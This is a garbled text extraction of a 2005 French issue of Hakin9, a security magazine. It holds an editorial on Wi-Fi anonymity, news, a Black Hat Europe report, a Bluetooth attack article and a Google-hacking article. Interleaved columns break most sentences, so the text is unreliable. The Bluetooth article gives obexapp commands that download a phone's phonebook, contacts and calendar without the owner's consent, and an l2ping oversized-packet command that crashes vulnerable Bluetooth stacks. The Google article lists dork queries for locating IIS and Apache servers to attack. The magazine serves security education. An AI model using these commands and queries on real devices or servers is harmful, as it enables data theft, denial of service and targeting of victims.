Académique Documents
Professionnel Documents
Culture Documents
Hakin9 N4 - 2005 - 11 PDF
Hakin9 N4 - 2005 - 11 PDF
Monika Godlewska
e-mail : monikag@software.com.pl
Science
Software-Wydawnictwo Sp. z o.o.,
Lewartowskiego 6, 00-190 Varsovie, Pologne
Tél. +48 22 860 18 81, Fax. +48 22 860 17 70
www.hakin9.org
Fiche technique
Campana, Gilles Gaffet, Sebastien Lecocq, Pierre-Emmanuel Leriche,
Gilles Fournil, Pierre Mennechet, Jeremy Canale
Tomasz Nidecki
Essaie de m’attraper
U
ne chaude soirée d’été. Le propriétaire du cyber serveurs différents pour arriver jusqu’à la victime tout
café du quartier, collé à l’écran de son ordina- en masquant l’origine d’effraction, est définitivement
teur, joue à Half-Life. Un jeune homme, habillé terminée. Les cybers cafés ont permis aux malfrats un
très chic, entre dans le café. Il porte les lunettes Gucci vrai anonymat. Cependant, ces cafés n’étaient pas pour
et une chemise soigneusement repassée. Le jeune eux très pratiques. Le pirate était contraint d’utiliser un
homme affiche un large sourire. Il paye au comptoir une ordinateur et le payer. À présent, les cybers pirates
heure de connexion à Internet. La serveuse, jeune amie peuvent exprimer leur infinie gratitude à ceux qui ont
du propriétaire, est à moitié endormie et ne fait pas spé- inventé des hot spots gratuits. Maintenant, il leur suffit
cialement attention au jeune homme. Elle est fascinée d’équiper le micro portable en carte Wi-Fi et s’asseoir
par les articles de la presse people qu’elle est en train sur un banc pour pouvoir capter tout le réseau. Et com-
de feuilleter. ment identifier ces individus ? D’après une adresse
Le jeune homme prend place dans un coin et branche MAC ? Vous voulez rire ! Dans ce cas précis, ils restent
sa clé USB à l’ordinateur. D’un air impassible, l’homme totalement impunis !
n’arrête pas de pianoter sur le clavier. Les habitués du Les hots spots deviennent de plus en plus populaires.
café ne font pas attention à lui non plus, car ceux-là Les commerçant y recourent de plus en plus pour attirer
sont captivés par les jeux en ligne et par la drague via le les clients. Même un petit restaurant dans mon quartier
chat. Le jeune homme quitte le café avant que l’heure ne affiche une pancarte publicitaire qui allèche la clientèle
s’écoule, tout en souriant gentiment. La serveuse mur- avec une entrée libre sur l'Internet. Je suis cependant
mure à peine un au revoir. persuadé que ce restaurateur n’a pas réfléchi à ce qu’il
Quelques jours plus tard, le café est encerclé par des puisse advenir, si l’un de ses clients cambriolait une
hommes cagoulés. Le propriétaire est sous le choc. Lui banque à partir du réseau installé dans son commerce.
et son amie sont menottés et embarqués dans un camion Il a dû penser que les voleurs iront plutôt chez le voisin.
de police. On apprend que quelques jours auparavant, Même sans les hots spots, la technique Wi-Fi est très
les archives de la DST ont été visitées et les malfaiteurs peu sécurisée. Chaque réseau sans fil est une vraie pas-
ont dérobé des données ultra confidentielles. L’infrac- soire. Beaucoup d’habitants d’immeubles optent pour le
tion a été commise à partir de l’adresse IP attribuée au réseau Wi-Fi, lequel leur permet de contourner les autori-
propriétaire du cyber café. Le propriétaire tente en vain sations des syndics pour faire passer le câble d’un balcon
d’expliquer qu’il ne peut pas répondre des actes de ses à l’autre, ou installer ce câble via le réseau téléphonique.
clients. Il fallait demander aux clients des pièces d’iden- La technique Wi-Fi est adoptée par les entreprises les-
tité et noter leurs numéros – rétorque le procureur. quelles ne veulent pas investir dans une infrastructure
Cette histoire n’est pas réelle mais elle peut bientôt câblée. Violer l’accès d’un réseau Wi-Fi est non seule-
le devenir. Là encore, il n’y aura pas de justifications ment beaucoup plus simple que de faire une effraction
possibles. La victime pourrait être non seulement un pro- dans un réseau câblé, mais de plus, cette technique
priétaire d’un cyber café mais aussi bien le propriétaire empêche de trouver l'auteur du crime. Car comment
d’une entreprise qui n’a aucun rapport avec l’Internet établir quel individu tel jour et à telle erreur se trouvait
– par exemple, un restaurateur qui aurait mis en place un à proximité du réseau (pas forcément dans les locaux de
hot spot pour ses clients, ou bien encore l’administrateur l’entreprise ou dans l'immeuble mais par exemple dans la
d’un réseau local qui fonctionnerait avec un système Wi- cour) avec un ordinateur.
Fi. Une fois de plus, les justifications, en cas d’effraction, Je suis peut-être un râleur nostalgique, cependant,
ne serviront à rien. Qui va chercher le vrai coupable d’ef- je regrette le bon vieux temps. Je préfère avoir moins
fraction ? Les preuves seront solides et l’adresse IP sera de facilité pour me connecter à l’Internet mais en revan-
suffisamment parlante. che, être certain de pouvoir identifier un pirate potentiel
Passer inaperçu est un jeu d’enfant pour un cam- et le prendre sur le fait. Alors, pour protester contre cette
brioleur qui pénètre dans un réseau. L’époque où le menace, je reste fidèle au réseau BNC. Cela me permet
malfrat devait établir une connexion à travers cinq de dormir tranquillement. n
S
ur le CD joint à la revue, vous trouverez C'est fluxbox, avec le gestionnaire ROX et le moniteur
hakin9.live (h9l) en version 2.5.2 – distribution système Torsmo qui est actuellement l'environnement
Linux bootable intégrant les outils nécessaires, graphique par défaut. Un tel ensemble se présente bien,
la documentation, les tutoriaux et les matériaux complé- il est hautement configurable et ses exigences matériel-
mentaires aux articles. les ne sont pas élevées. En même temps, il est possible
Pour commencer à utiliser hakin9.live, il suffit de de démarrer Xfce 4 en version 4.2.1.1 (option de démar-
démarrer l'ordinateur avec le CD inséré dans le lecteur. rage hakin9 xfce4).
Les options supplémentaires concernant le démarrage
du disque (le choix de la langue, une autre résolution, Tutoriaux et documentation
la désactivation du framebuffer, etc.) ont été décrites dans La documentation contient, hormis les astuces concer-
la documentation disponible sur le CD – c'est le fichier nant le démarrage et la gestion de hakin9.live, les tuto-
help.html (si vous voulez le lire à partir du h9l démarré, riels préparés par la rédaction comprenant les exercices
le fichier se trouve dans /home/haking/help.html). pratiques. En ce qui concerne les tutoriels, nous présup-
posons que vous utilisez hakin9.live. Ainsi, vous évitez les
Quoi de neuf ? problèmes liés aux différentes versions des compilateurs,
La version 2.5.2 h9l est basée sur Aurox Live 10.2. à un autre emplacement des fichiers de configuration ou
Le système tourne sous la surveillance du noyau 2.6.9. aux options indispensables pour démarrer un logiciel
La détection du matériel a été corrigée et la configuration donné dans un environnement choisi.
du réseau améliorée. Le menu est également standar- La version actuelle de hakin9.live, outre les tutoriaux
disé – tous les logiciels ont été regroupés dans les caté- des éditions précédentes, en intègre deux nouveaux. Le
gories adéquates, ce qui offre l'accès aux applications premier montre comment communiquer en utilisant la
données beaucoup plus intuitif. La nouvelle hakin9.live stéganographie réseau (et les en-têtes TCP/IP).
intègre plusieurs nouveaux matériaux supplémentaires Le second concerne la récupération sécure des don-
– les documents RFC mis à jour, quelques livres gratuits nées à partir des systèmes de fichiers dans Linux. Ce
au format PDF et HTML et les articles non publiés. Le hit doument décrit la mise en pratique du savoir-faire com-
de ce numéro est une publication intitulée An Introduction pris dans l'article Récupération des données à partir des
to Security (auteur collectif) au format PDF et TXT. systèmes de fichiers Linux. n
Figure 1. hakin9.live vous offre plusieurs outils Figure 2. Plusieurs nouveaux matériaux
disponibles sur un CD supplémentaires
à 21 mois de prison
Webroot, la production des pro-
grammes de type spyware devient
une affaire en or : les bénéfices
Âgé de 21 ans, Raymond Paul Stei- Le ver permettait de prendre annuels de cette branche atteignent
gerwalt, le pirate américain, accusé le contrôle des systèmes infectés 2 milliards de dollars. Le document
d'avoir infecté le Département de la à travers les canaux IRC. Il permet- publié contient aussi une thèse
Défense des États Unis (Department tait d'exécuter plusieurs processus audacieuse que ce procédé peut
même faire obtenir 25 % de marché
of Defense) par le ver TK worm, a été dangereux au niveau de la machine
de la publicité dans l'Internet.
puni d'une peine de 21 mois d’incar- infectée – à partir du scannage Les programmes affichant de la
cération. S'y ajoute un dédommage- des autres machines pour détec- publicité ou redirigant les navi-
ment de 12 000 dollars au profit du ter les failles dans les systèmes gateurs vers des adresses non
Département de la Défense. Il paraît de protection jusqu'aux attaques souhaitées constituent, d'après les
que Steigerwalt est devenu un bouc DDoS contre d'autres ordinateurs études, plus de la moitié de toutes
les infections. Bien que la cons-
émissaire et était puni pour tous les et réseaux. En 2002 en Grande
cience des utilisateurs augmente,
auteurs du ver. Bretagne, TK worm a entraîné les les infections sont de plus en plus
TK worm a été identifié pour la pre- pertes financières de plus de 5,5 fréquentes.
mière fois dans la 1ère moitié de 2002. millions livres. Les statistiques sont effrayantes
Il exploitait les failles dans le serveur Steigerwalt a été aussi con- – depuis janvier jusqu'à avril 2005,
Microsoft Internet Information Services damné pour la détention d'images de environ 90% des machines dans
les entreprises et dans les mai-
pour se diffuser et installer les portes pornographie infantile. Entre 2002
sons ont été infectées. Bien que le
dérobées contrôlées par les concep- et 2003, il était membre du groupe nombre de nouveaux programmes
teurs du ver. Au moins deux ordina- Thr34t Krew (TK), soupçonné d'avoir malicieux détectés baisse, les
teurs appartenant au Département de créé le ver TK worm. régulations légales incriminant ce
la Défense ont été contaminés. procédé n'existent pas. Même les
États Unis n'ont pas réussi l'année
passé à introduire les règlements
Microsoft : appropriés.
D
u 29 mars au 1 avril 2005 à Amsterdam, l'édition aussi mentionner la conférence de Job de Haas, consa-
européenne de l'une des plus importantes con- crée à la sécurité du système Symbian, conçu pour les
férences dédiées à la sécurité IT – Black Hat périphériques mobiles. Le cours d'Aleksander Kornbrust
Europe (http://www.blackhat.com) a eu lieu. Pendant concernant les rootkits de bases de données était aussi
quatre jours, plus de quarante conférences et ateliers, une surprise très agréable.
d'ailleurs très bien organisés, ont eu lieu. Les présenta- Hélas, rien n'est parfait et nous avons connu deux
teurs, meilleurs spécialistes des quatre coins du monde, déceptions. La première était le cours de Kenneth Geers
ont surpris les participants par leur savoir-faire et par leur sur la sécurité réseau en Russie – les informations étaient
démonstration. Le partenaire médiatique de cette ren- assez banales et on pouvait remarquer une certaine fas-
contre de printemps était le magazine hakin9. cination de l'auteur sur la vision informatique russe. Le
Les ateliers (appelés par Black Hat Trainings) étaient deuxième échec, un peu plus léger, était la conférence
des présentations pratiques très bien préparées tout de Jon Callas du PGP Corporation intitulé Hacking PGP,
comme les cours (Briefings), très appréciés par l’équipe qui pouvait être traitée comme une crypto-publicité de
de hakin9. Ces derniers, divisés en deux catégories l'entreprise (un long discours qui s'est terminé par la con-
simultanés, placés les participants devant un dilemme : clusion que le PGP est pratiquement inviolable).
que choisir. Les enregistrements audio et vidéo et les matériaux
Il est difficile d'énumérer ici tous les évènements de la conférence sont à télécharger à partir du site Web
importants, mais notre équipe a été impressionnée par le de Black Hat. Mais la participation personnelle à la con-
cours de Dan Kaminsky, traitant du transfert des données férence a fourni des impressions inoubliables. Malgré le
et de l'omission des pare-feux à l'aide du protocole DNS. prix très élevé – plus de 1000 dollars pour deux jours de
Dan a démontré comment, dans les requêtes DNS, on conférence – la participation à ce type d'événement est
peut transférer des informations quelconques – à partir nécessaire pour tous ceux qui veulent être au courant
de chaînes de caractères très simples jusqu'aux données des derniers problèmes liés à la sécurité IT. Mais rien
audio et vidéo. La transmission en ligne voice over DNS n’est fini – bien que la conférence américaine ait déjà eu
a été accueillie par de vifs applaudissements. lieu, la conférence Black Hat Asia au Japon sera tenue
La conférence de l'équipe d'Adam Laurie, le spécia- en octobre 2005.
liste le plus connu sur la sécurité du protocole Bluetooth, Roman Polesek
Figure 1. Les formations furent d'un grand intérêt Figure 2. L'équipe de hakin9 : Tomasz Nidecki, Roman
Polesek
D
e plus en plus de périphériques virus fonctionnant sur ces périphériques – de
communiquent à travers Bluetooth leur façon de se propager, du fonctionnement
(cf. l'Encadré Bluetooth bondissant). et des méthodes permettant de les éliminer.
Ce protocole peut être utilisé, par exemple,
pour connecter un ordinateur portable à Inter- Ainsi parlait la spécification
net à l'aide d'un téléphone mobile, pour se ser- La spécification du Bluetooth détermine trois
vir d'un casque d'écoute sans fil, il permet aussi nivaux de protection à implémenter dans les
de construire les réseaux dans les bureaux. périphériques :
Ses domaines d'application sont pratiquement
illimités. • niveau 1 – sans protection,
Pourtant, ce protocole n'est pas très sûr, • niveau 2 – la protection au niveau des servi-
et une multitude d'applications deviennent ces,
dangereuses pour l'utilisateur. Il existe déjà de
nouveaux virus diffusés via Bluetooth. Derniè-
rement, le virus Cabir a semé le trouble, mais Cet article explique...
il n'est pas le seul – il existe encore Dust, le virus
• comment détecter les périphériques dotés du
contaminant les périphériques de type PDA,
Bluetooth,
et Lasco, très similaire à Cabir, mais beaucoup • comment cibler une attaque contre ces péri-
Dossier
• l'adresse du périphérique – de
48 bits, l'adresse unique du péri-
Bluetooth bondissant
Bluetooth fonctionne sur la bande de fréquence de 2,4 GHz, et plus précisément phérique concret déterminée par
dans la gamme de 2402–2480 MHz. La bande est divisée en 79 canaux d'une lar- IEEE (Institute of Electrical and
geur de 1 MHz, entre lesquelles sautent les périphériques communiquants. Si ces Electronic Engineers),
périphériques sont synchronisés, un seul canal logique permettant d'envoyer les • la clé de chiffrage privée – la clé
données est créé. utilisée pour le chiffrage des don-
Pour un observateur extérieur, les données sont tout simplement une série nées, d'une longueur de 8–128
d'impulsions se produisant sur différentes fréquences, apparemment aléatoires. bits (en fonction du pays du fabri-
Les périphériques changent les fréquences (canaux) conformément à un certain cant),
algorithme. Cet algorithme est différent pour chaque connexion établie dans une
• la clé d'authentification privée
zone donnée.
– cette clé est utilisée pour
La première phase de l'établissement d'une connexion entre les périphéri-
authentifier l'utilisateur, d'une lon-
ques est l'ajustage du client à l'algorithme des sauts du serveurs et à la phase
déterminée de cet algorithme – à partir de ce moment, les deux périphériques gueur de 8–128 bits (en fonction
sautent ensemble. Ce n'est pas facile, vu que les sauts de fréquences s'effec- du pays du fabricant),
tuent 1600 fois par seconde. Pour pouvoir écouter la communication entre deux • nombre aléatoire RAND – le
périphériques Bluetooth, il faut écouter la séquence initialisant la connexion, au nombre pseudo-aléatoire, de 128
moment où l'un des périphériques propage les données concernant son algo- bits, généré de temps en temps
rithme de sauts. par le périphérique,
Si dans une zone, plusieurs périphériques fonctionnent, il est probable qu'à • les algorithmes de la généra-
un moment plus d'une paire communique à travers un canal. Mais ce n'est pas un tion des clés – E0, E21 et E22
problème. Le protocole de la transmission des données au niveau de la couche de
(cf. l'Encadré Bluetooth et algo-
liaison de données assure dans cette situation une solution correcte – la transmis-
rithmes E).
sion du paquet erroné est répétée sur le premier canal libre.
La portée de la communication Bluetooth est de moins de 10 jusqu'au plus de
100 mètres (en fonction de la puissance de l'émetteur et du récepteur). La plupart Comme nous l'avions dit, le
des périphériques sont munis d'une antenne de faible puissance – le coût d'un tel deuxième niveau de protection est
périphérique est moins élevé, la consommation d'énergie est également plus faible réalisé par le chiffrage des données
(ce qui est important, étant donné que ces périphériques sont alimentés avec des envoyées. Pour cela, on utilise la
batteries). Cela signifie qu'un écoutant devra se trouver à une distance de quelques clé de chiffrage d'une longueur de
mètres. Pourtant, malgré les apparences, ce n'est pas une difficulté – il y a plusieurs 8–128 bits, générée à l'aide de l'al-
endroits où l'on peut effectuer une attaque sans être vu, tout en se trouvant très gorithme E0. Cette taille dépend de
près du périphérique attaqué. L'exemple le plus banal est le hall d'arrivées d'un plusieurs facteurs – entre autres, de
aéroport.
la puissance de calcul du périphéri-
que concerné et de la législation du
pays d'origine. Étant donné que dans
• niveau 3 – la protection au niveau entrantes ne sont effectuées – sans la communication peuvent participer
de la connexion réseau. parler du chiffrage des données des périphériques utilisant des clés
envoyées. Ce chiffrage est parfois de longueurs différentes, lors de
La plupart des périphériques sont effectué au niveau de l'application l'établissement de la connexion chif-
configurés par défaut de façon (2ème niveau de protection). frée, elles négocient la longueur de
à fonctionner sans protection. Aucu- Mais Bluetooth permet d'effectuer la clé commune.
ne authentification (vérification de l'authentification et l'autorisation au ni- Le troisième niveau est réalisé
l'identité) ni autorisation (définition veau de la connexion réseau – il suffit à travers la phase d'authentification
des droits d'accès) des connexions de configurer le périphérique de façon et d'autorisation. Son composant le
à ce que celui-ci demande l'authenti- plus important est la clé de liaison.
fication, l'autorisation et le chiffrage Cette clé est utilisée toujours quand
À propos de l'auteur pour les connexions entrantes et en- il faut protéger une connexion ré-
Tomasz Rybicki est membre
voie lui-même ces informations lors seau – indépendamment du nombre
du MEAG (Mobile and Embed-
de l'initialisation d'une connexion. de périphériques participant à la
ded Applications Group – http://
Dans chaque périphérique utili- communication. La clé de liaison est
meag.tele.pw.edu.pl), l'équipe agis-
sant au sein de l'Institut de Télécom- sant la technologie Bluetooth, cinq un nombre pseudo-aléatoire, d'une
munication de l'École Polytechnique éléments assurant la sécurité des longueur de 128 bits. Elle peut être
de Varsovie. Il s'occupe des applica- connexions sont disponibles. Ces temporaire – valide jusqu'à la fin de
tions mobiles fonctionnant en tech- éléments sont utilisés pour la géné- la session courante, ou permanente
nologie J2ME. Contact de l'auteur : ration des clés et l'implémentation du – après la terminaison de la ses-
trybicki@autograf.pl. chiffrage au deuxième et troisième sion, elle peut être exploitée pour
niveau de protection : des authentifications ultérieures
nombre et de la clé actuelle, la deux nombres aléatoires, RANDA sée pour la génération de la clé de
clé de transmission est créée. Le et RAND B, et les renvoient récipro- liaison LK, et enfin, la clé de liaison
serveur crée une clé étant une quement l'un à l'autre (chiffrés sous en tant que telle (elle est utilisée ul-
transformation XOR de la clé forme d'une disjonction exclusive térieurement pour la génération de la
principale et de transmission et avec le nombre K). clé de chiffrage).
l'envoie au client, qui à partir ce Ensuite, connaissant leurs Si l'on fait un petit effort, on peut
celle-ci, calcule la clé principale. adresses et leurs propres nombres intercepter les nombres RAND, CA,
• Dans le cas de périphériques aléatoires (RANDA et RAND B), CB, CH_RAND, SRESB. Pour ce faire,
qui ne communiquaient pas les périphériques génèrent la la synchronisation avec l'algorithme
Figure 1. Les phases successives de l'établissement d'une connexion entre deux périphériques Bluetooth
Détecter l'indétectable
Pour établir une connexion réseau
à l'aide du Bluetooth, l'adresse (URL)
du périphérique cible est nécessaire.
Pour obtenir les adresses de tous les
périphériques qui se trouvent à proxi-
mité, il faut effectuer la recherche.
Cette opération consiste à envoyer par
le périphérique un message approprié
Figure 2. La recherche des adresses des périphériques Bluetooth à l'adresse broadcast. Les périphéri-
ques fonctionnant en mode détecta-
il n'est pas nécessaire d'effectuer Dissimulation ble écoutent ces types de messages
les cycles de calculs. Une autre méthode d'attaque est et y réagissent par l'envoi d'un court
Un avantage supplémentaire l'utilisation de la clé du périphérique. message contenant, entre autres,
de cette attaque est la possibilité Envisageons le scénario suivant leurs adresses. Les périphériques qui
d'ajouter aux informations possé- – les périphériques A et B commu- sont en mode indétectable négligent
dées, les données sur la clé de niquent entre eux à l'aide de la clé ces messages et leurs adresses ne
chiffrage. Pour la générer, on uti- du périphérique A. Après un certain sont pas rendues publiques.
lise la clé de liaison actuelle LK, temps, le périphérique A se connec- Ce processus est présenté sur la
et le nombre pseudo-aléatoire est te avec le périphérique C, en utili- Figure 2. Le périphérique A recher-
envoyé (de nouveau) entre les pé- sant aussi la clé du périphérique A. che les périphériques se trouvant
riphériques de façon non chiffrée. Le périphérique B, possédant la à proximité ; la couleur bleu signifie
Si vous connaissez la clé de liaison clé du périphérique A, peut sans que le périphérique trouvé est en
(attaque sur E22) et le nombre problème écouter la transmission, mode détectable, rouge – en mode
pseudo-aléatoire, il est facile de ou même se faire passer pour le indétectable. Comme vous voyez,
calculer la clé de chiffrage. périphérique C. tous les périphériques reçoivent le
En pratique, une telle attaque message de requête (en anglais
Attaque sur le PIN (en ligne) peut être effectuée à l'aide d'un inquiry), mais seuls les périphéri-
Dans certaines situations, il est pos- ordinateur portable doté de la carte ques en mode détectable répon-
sible de se procurer le numéro PIN Bluetooth. Lors de l'établissement dent (c'est-à-dire les périphériques
en ligne. Certains périphériques pos- de la connexion, les deux périphéri- B et C). Le périphérique D néglige le
sède un code PIN fixe – contre les ques participant à la communication message de requête.
attaques, il est protégé seulement négocient la clé de liaison qui sera On peut avoir l'impression qu'il est
par le temps exponentiel entre les utilisée. En modifiant la structure de impossible d'établir une connexion
tentatives d'authentification succes- la pile des protocoles, il est possible entre les périphériques fonctionnant
sives. Ce type de protection peut d'imposer que le périphérique atta- en mode indétectable. Mais ce n'est
être facilement contourné – il suffit, quant (ordinateur portable) demande pas vrai. Le périphérique en mode
Dossier
après chaque tentative d'authentifi- chaque fois l'utilisation de la clé du indétectable néglige les messages de
cation non réussie (et le code PIN périphérique attaqué. Ainsi, l'as- requête, mais répond aux messages
incorrect), de changer l'adresse du saillant (périphérique B) est capable adressés directement à lui.
périphérique. Dans le cas d'un télé- de prendre connaissance de la clé Mais comment l'assaillant peut
phone ou PDA, cette opération sera du périphérique attaqué (périphéri- connaître l'adresse d'un périphérique
plutôt difficile, mais un ordinateur que A). d'une longueur de 48 bits ? Il peut,
portable muni d'une carte Bluetooth Une fois la connexion terminée, par exemple, la générer. Et il n'a
offre de grandes possibilités de s'in- le périphérique B effectue l'écoute – pas besoin de 248 -1 combinaisons,
troduire dans la pile Bluetooth. au moment où il enregistre l'adresse comme on pourrait supposer.
à employer ce périphérique : ini- vers le port sur lequel le modem écoute. Dans Windows, vous pouvez les envoyer soit
tialiser les connexions sonores ou à travers l'HyperTerminal, soit à l'aide de l'onglet Diagnostic (Diagnostics) dans les
propriétés du modem dans le panneau de configuration.
envoyer des messages SMS. Ce
Les exemples des commandes AT :
type d'attaque est plus puissant
que cela pourrait paraître – les • ATA – indique au modem qu'il doit répondre à l'appel,
pertes des données ou les pertes • ATDn – indique au modem de composer le numéro n,
financières (p. ex. l'initialisation des • ATLn – volume du haut-parleur interne du modem (n=0 volume faible, n=3 volume
connexions avec les numéros de ty- élevé).
pe premium) ne sont que le prélude
l'intermédiaire de BlueBug se trouve • hccontrol – sert, entre autres, Dans la dernière étape, vous saisis-
à l'adresse http://www.saftware.de/ à détecter les périphériques se sez le nom sous lequel vous voulez
bluetooth/btxml.c. Le programme trouvant dans le voisinage, enregistrer le fichier :
tourne sous Linux et utilise son im- • l2control – affiche la liste des
plémentation de la pile Bluetooth, connexions établies, get: local file > nom_du_fichier
BlueZ. Cette application permet, • l2ping – fonctionne de façon ana-
entre autres, de copier le carnet logue au programme ping. Une fois le téléchargement terminé,
d'adresses à partir d'un périphérique le message suivant s'affiche :
distant, et cela sans aucune authen- Ces utilitaires permettent de col-
tification. Bluesnarfer, disponible lecter les informations sur les Success, response: §
à l'adresse http://www.alighieri.org/ périphériques dotés de Bluetooth OK, Success (0x20)
tools/bluesnarfer.tar.gz fonctionne qui se trouvent à proximité. Mais
de façon similaire. pour attaquer un téléphone, nous Ainsi, vous avez accès à tous les
nous servirons d'un autre outil fichiers du périphérique. Les plus
Bluejacking – obexapp, disponible à l'adresse intéressants sont :
L'une des couches de la pile de http://www.geocities.com /m_ev-
protocoles Bluetooth est la couche menkin. Cet outil sera utilisé pour • telecom/pb.vcf, contenant le car-
OBEX (cf. l'Encadré Bluetooth sur charger des fichiers à partir d'un net d'adresses,
la pile), présente aussi dans les téléphone, à l'insu et sans accord • telecom/pb/luid/*.vcf – les fi-
téléphones possédant l'interface du propriétaire. chiers de cartes de visites enre-
IrDA. OBEX permet d'envoyer des Dans la première étape, il faut gistrés dans le périphérique,
paquets anonymement (c'est-à-dire initialiser la connexion OBEX (cf. • telecom/cal.vcs, contenant
sans authentification), sans devoir l'Encadré Bluetooth sur la pile) en l'agenda et le gestionnaire de
établir une connexion (l'échange de tapant la commande : tâches.
clé) entre les périphériques. L'écran
du périphérique attaqué affiche une # obexapp -a BD_ADDR -f-C 10 Les noms de tous les fichiers que
inscription de type : l'on peut télécharger sont disponibles
BD _ ADDR est l'adresse du périphéri- sur les pages man de la commande
'You have been bluejacked' § que avec lequel vous voulez vous obexapp. Pour pouvoir accéder aux
received by Bluetooth connecter (pour le connaître, vous données désirées, il suffit d'ouvrir
pouvez utiliser le programme men- le fichier téléchargé dans un éditeur
C'est un message informant qu'on tionné hccontrol). Le drapeau -f quelconque.
a obtenu l'objet appelé You have indique au périphérique que l'on veut
been bluejacked. Cet objet peut être se connecter au service de consulta- Attaque Denial of Service
une carte de visite ordinaire – l'envoi tion des dossiers. Par contre l'option Certaines implémentations de la
des cartes de visite est une fonc- -C 10 définit que l'on veut se connec- pile Bluetooth sont vulnérables aux
tion standard offerte par plusieurs ter au service OBEX PUSH, permet- attaques de type DoS (Denial of
périphériques. À l'adresse http:// tant d'envoyer et de télécharger les Service). Cette attaque consiste
www.mulliner.org/palm/bluespam. fichiers à partir du périphérique. à envoyer un paquet modifié au
php, vous trouverez un programme Ainsi, vous avez accès à la ligne périphérique. Ce paquet entraîne le
(pour le système PalmOS) permet- de commandes de la connexion plantage du fonctionnement de la
tant de détecter et d'attaquer de la OBEX : pile Bluetooth.
sorte les périphériques à proximité. En quoi consiste la modification
Heureusement, Bluejacking n'est pas obex> du paquet ? Chose étrange, il chan-
dangereux pour les données stoc- ge uniquement la taille du paquet
kées dans le périphérique. Ensuite, vous commencez la ses- en supérieure à 65536 octets. Ces
Certaines implémentations sion de téléchargement des fichiers attaques peuvent être effectuées
d'OBEX permettent aussi d'inter- à partir du téléphone : à l'aide des outils standards du pa-
cepter des fichiers de manière non quet Linux BlueZ – il suffit de taper la
autorisée. À vrai dire, il n'est pas trop obex>get commande :
difficile d'effectuer ce type d'attaque.
Pour s'attaquer au Ericsson T610, on et vous entrez le nom du fichier à té- $ l2ping –s <taille_du_paquet>
utilisera FreeBSD. Après l'installation lécharger :
d'une carte appropriée et l'initialisa- La faille permettant d'effectuer une
tion (en noyau ou en module) de la get: remote file § telle attaque résulte des erreurs
pile Bluetooth, FreeBSD donne accès (empty for default vCard)> § dans l'implémentation de la pile
à quelques outils très intéressants : nom_du_fichier Bluetooth et c'est pourquoi, elle
G
oogle répond à environ 80 pourcent
de toutes les questions posées et par Cet article explique...
conséquent, c'est le moteur de recher-
che le plus utilisé. Cela est dû non seulement • comment rechercher des informations confiden-
à son mécanisme de génération de résultats tielles en utilisant Google,
• comment trouver des informations sur des sys-
très efficace mais aussi à de grandes possi-
tèmes et des services réseaux vulnérables aux
bilités au niveau des questions posées. Il ne
attaques,
faut pas pourtant oublier qu'Internet est un
• comment trouver dans Google des périphéri-
média très dynamique et que les résultats de ques réseaux disponibles au grand public.
recherche présentés par Google ne sont pas
toujours d'actualités. Il arrive que certaines pa-
Ce qu'il faut savoir...
ges trouvées soient vieilles et que plusieurs pa-
ges ayant un contenu similaire n'aient pas été • savoir utiliser un navigateur Web,
visitées par Googlebot (script ayant pour but de • avoir un savoir-faire de base sur le protocole
rechercher et d'indexer les ressources Web). HTTP.
Les opérateurs de précision les plus impor-
tants et les plus utiles, y compris leur descrip-
tion et le résultat de leur fonctionnement, sont
présentés dans le Tableau 1. Les endroits des À propos de l'auteur
Focus
site limite les résultats aux pages se site:google.com fox trouvera toutes les pages conte-
trouvant dans un domaine défini nant le mot fox dans leur texte et se trouvant dans le
domaine *.google.com
intitle limite les résultats aux documents intitle:fox fire trouvera les pages contenant le mot
contenant une phrase donnée dans fox dans le titre et fire dans le texte
le titre
limite les résultats aux documents allintitle:fox fire trouvera toutes les pages contenant
allintitle contenant toutes les phrases don- les mots fox et fire dans le titre ; son fonctionnement
nées dans le titre est similaire à celui de intitle:fox intitle:fire
inurl limite les résultats aux pages inurl:fox fire trouvera les pages contenant les mot fire
contenant une phrase donnée dans dans le texte et fox dans l'adresse URL
l'adresse URL
allinurl limite les résultats aux pages con- allinurl:fox fire trouvera les pages contenant les mots
tenant toutes les phrases données fox et fire dans l'adresse URL ; son fonctionnement est
dans l'adresse URL similaire à celui de inurl:fox inurl:fire
filetype, ext limite les résultats à un type de retournera les documents PDF
filetype:pdf fire
document donnée contenant le mot fire et filetype:xls fox retournera les
documents Excel contenant le mot fox
numrange limite les résultats aux documents numrange:1-100 fireretournera les pages comprises
contenant dans leur texte le nombre entre 1 et 100 contenant le mot fire. Le même résultat
d'une page définie peut être obtenu en posant la question : 1..100 fire
link limite les résultats aux pages link:www.google.fr retournera les documents conte-
contenant des liens vers une page nant au moins un lien vers la page www.google.fr
donnée
limite les résultats aux pages avec inanchor:fire retournera les documents contenant les
inanchor
un lien contenant dans sa descrip- liens possédant le mot fire dans sa description (non
tion une phrase donnée dans l'adresse URL vers laquelle ils conduisent mais
dans la partie soulignée du texte représentant le lien)
allintext
limite les résultats aux documents allintext:"fire fox" retournerales documents conte-
contenant dans le texte une phrase nant la phrase fire fox seulement dans le texte
donnée sans se soucier du titre, des
liens et des adresses URL
""
permet de rechercher toutes les "fire fox" retournera les documents contenant la
phrases et pas seulement que les phrase fire fox
mots
. est remplacé par un caractère fire.fox retournera les documents contenant les phra-
unique ses fire fox, fireAfox, fire1fox, fire-fox etc.
* est remplacé par un mot unique fire * fox retournera les documents contenant les phra-
ses fire the fox, fire in fox, fire or fox etc.
OR logique "fire fox" | firefox retournera les documents contenant
|
la phrase fire fox ou le mot firefox
seulement de trouver des ressour- nément utilisé. Admettons qu'il ple deux logiciels assez populaires :
ces Internet visant plutôt le grand concerne le serveur Microsoft IIS WebJeff Filemanager et Advanced
public mais aussi des ressources en version 5.0 et que l'objectif d'un Guestbook.
dites confidentielles et donc privées. agresseur potentiel soit de trouver Le premier d'entre eux est un
Si vous posez une question appro- quelques machines équipées de ce gestionnaire de fichiers Web per-
priée, il se peut que vous receviez de logiciel afin de les attaquer. Bien sûr, mettant d'envoyer des fichiers sur
surprenants résultats. Commençons il pourrait utiliser à cette fin un scan- des serveurs. De plus, grâce à ce
par quelque chose de simple. ner mais il préfère choisir Google logiciel, il est possible de créer,
Question Serveur
"Apache/1.3.28 Server at" intitle:index.of Apache 1.3.28
"Apache/2.0 Server at" intitle:index.of Apache 2.0
"Apache/* Server at" intitle:index.of n'importe quelle version d'Apache
"Microsoft-IIS/4.0 Server at" intitle:index.of Microsoft Internet Information Services 4.0
"Microsoft-IIS/5.0 Server at" intitle:index.of Microsoft Internet Information Services 5.0
"Microsoft-IIS/6.0 Server at" intitle:index.of Microsoft Internet Information Services 6.0
"Microsoft-IIS/* Server at" intitle:index.of n'importe quelle version de Microsoft Internet Informa-
